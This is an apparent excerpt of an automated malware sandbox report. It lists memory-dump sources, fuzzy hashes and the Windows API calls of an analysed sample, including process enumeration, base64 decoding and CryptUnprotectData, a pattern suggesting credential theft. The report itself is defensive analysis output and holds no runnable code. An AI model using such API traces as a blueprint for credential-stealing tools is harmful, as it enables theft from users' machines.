                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 68771b5c25c747cb4f6cfedefe140b4abdd53e4fa6551f5361c6023c78712999
                            • Instruction ID: aac5495004325efc6f4c0f54b0ffec7a809588c88adcf4e2c2cdc830556398b3
                            • Opcode Fuzzy Hash: 68771b5c25c747cb4f6cfedefe140b4abdd53e4fa6551f5361c6023c78712999
                            • Instruction Fuzzy Hash: 7581BD31905324CFC714CF18E988B95B7E1EB45729F29C1E9D40DAB2A2D77A9D82CF90
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00B0EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00B0EA7E
                            • lstrcat.KERNEL32(00B2CFEC,00B2CFEC), ref: 00B0EB27
                            • lstrcat.KERNEL32(00B2CFEC,00B2CFEC), ref: 00B0EB49
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 523283f22922fa9d70ac0861b4207fbcf72d3164b3080afd81b4589f7997e5ec
                            • Instruction ID: 1a7d03c437771fe632f7f6efa67082b19c3fad16cbc014f82609d1599bf88c30
                            • Opcode Fuzzy Hash: 523283f22922fa9d70ac0861b4207fbcf72d3164b3080afd81b4589f7997e5ec
                            • Instruction Fuzzy Hash: 4131B575A00219ABDB109B58EC45FEFBBBDDF84705F0441A5FA09E3280DBB15A048BB1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00B240CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00B240DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B240E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00B24113
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 55894c795e0f8fb142693406b290d1dfbeae6ae06666223dcc18511b0b6360c0
                            • Instruction ID: 663919c185b7e8965fe5e3161aa699bc7e3220014cd2d4618ad9b2d1a4e18c09
                            • Opcode Fuzzy Hash: 55894c795e0f8fb142693406b290d1dfbeae6ae06666223dcc18511b0b6360c0
                            • Instruction Fuzzy Hash: 28011E71600315ABDB109FA5EC95B6BBBADEF45311F108199BD09D7340DB719940CB64
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B09B61
                            • LocalFree.KERNEL32 ref: 00B09B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: fd322b13c93607f2784e7547264e986f03a8dc5780b37ddcea3241bde04d02e4
                            • Instruction ID: 0d32c97cf85d9872fa24b446c0ef8c2fc7d30e86c3e106e654be403a9cdf0df0
                            • Opcode Fuzzy Hash: fd322b13c93607f2784e7547264e986f03a8dc5780b37ddcea3241bde04d02e4
                            • Instruction Fuzzy Hash: BBF0BD703443126BE7305F65AC5AF56BFA8EF04B61F240554FA45EA3D0D7B49840CAA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: OT8$o^?]$~~k
                            • API String ID: 0-3998585715
                            • Opcode ID: d850e5bccaf94c9ae20fc9d45b5f1cfa80a84280bce6e122cf94b507c060ed2b
                            • Instruction ID: 6cc3b3cd5830bcb20150794482810c9e4f76ae5991f657154d3611c41c98fca7
                            • Opcode Fuzzy Hash: d850e5bccaf94c9ae20fc9d45b5f1cfa80a84280bce6e122cf94b507c060ed2b
                            • Instruction Fuzzy Hash: BCB216F3A0C204AFE3046E29DC4567ABBE5EF94720F1A893DEAC5C7744EA3558018797
                            APIs
                            • CoCreateInstance.COMBASE(00B2B110,00000000,00000001,00B2B100,?), ref: 00B1CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00B1CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 00B1CBC9
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: 8f66ef3fbd06d47111dd531aa7b908046122e183a904a828648eb09c943850c4
                            • Instruction ID: 2821be7bc9d505226800a9a97ba32c64ba8a545fea8f7b9db66eada0783806df
                            • Opcode Fuzzy Hash: 8f66ef3fbd06d47111dd531aa7b908046122e183a904a828648eb09c943850c4
                            • Instruction Fuzzy Hash: 78315771A406186FD710DB94DC92FAA77B59B88B11F1041C4BA04EB2D0D7B0AD44CBA0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B09BB3
                            • LocalFree.KERNEL32(?), ref: 00B09BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 17446e2cf64f329f1d61ed759d197b24393a1a4a001de9bf2a175d2e4dc672b7
                            • Instruction ID: 85ce9c17bdbe5b8517a3790de1bd5086197c6f39a656bbcd5bf4c56f066eb04b
                            • Opcode Fuzzy Hash: 17446e2cf64f329f1d61ed759d197b24393a1a4a001de9bf2a175d2e4dc672b7
                            • Instruction Fuzzy Hash: A7011D75A41309ABD7109BA4DC55FAEB7B8EB44B00F104554FA04EB381E7B09E00CBE1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4?m$}?
                            • API String ID: 0-2831152445
                            • Opcode ID: a0e2869c74d863230595f9453a250cf4f3f1b1e8ef321fb5a058b1dd3985131f
                            • Instruction ID: 01a2ebace0fbb31f1435bcea1d5893f7a09f2ef9cdc07511d66e779e6d6df6f3
                            • Opcode Fuzzy Hash: a0e2869c74d863230595f9453a250cf4f3f1b1e8ef321fb5a058b1dd3985131f
                            • Instruction Fuzzy Hash: 9C716AF3A087088FE704AE3EDC8536AFBD6EB94320F164A3DE9D4D7744E93958018652
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Sa?=
                            • API String ID: 0-2975840362
                            • Opcode ID: 78f8c1732fea79dee3d59afe3d84c64fb7e73568393622b7efe4bcf1bf633cfd
                            • Instruction ID: db29e03cba9cdc9232fa36f361b0325f4fe2cfd8f3b38c08b6d3c59868fb18ca
                            • Opcode Fuzzy Hash: 78f8c1732fea79dee3d59afe3d84c64fb7e73568393622b7efe4bcf1bf633cfd
                            • Instruction Fuzzy Hash: 22714AF3A181105BE3086E3DEC1977BBBD9DF94320F1A063DEAD9D3380E57999158282
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: fphW
                            • API String ID: 0-869481067
                            • Opcode ID: f4cd47bcd8067c97599a290bd498d091cbb23fa7dd774f661ebc7cf3040a60e5
                            • Instruction ID: 8e59896f4ef531f7059f3abe2dd661d3112c90f7e92c3517a3dc9036ed82eb14
                            • Opcode Fuzzy Hash: f4cd47bcd8067c97599a290bd498d091cbb23fa7dd774f661ebc7cf3040a60e5
                            • Instruction Fuzzy Hash: 8D518CF26086009FE718BF28DC8676AB7E5EB94310F06492CE6D5C7380EA7599548B87
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +C\
                            • API String ID: 0-2958185382
                            • Opcode ID: db48fd046f26ebe2174d1cb51741850f5382e004946fa5ce5c03af473c72a70b
                            • Instruction ID: 95bcb86e12bb2155a3d57987122cd926664d25bee9eb49226d8d1f2251cd06bb
                            • Opcode Fuzzy Hash: db48fd046f26ebe2174d1cb51741850f5382e004946fa5ce5c03af473c72a70b
                            • Instruction Fuzzy Hash: BF315BF7A0C6089BE314792DDC4977BB7D5DBD0720F1A463EE698C3350F97558054292
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
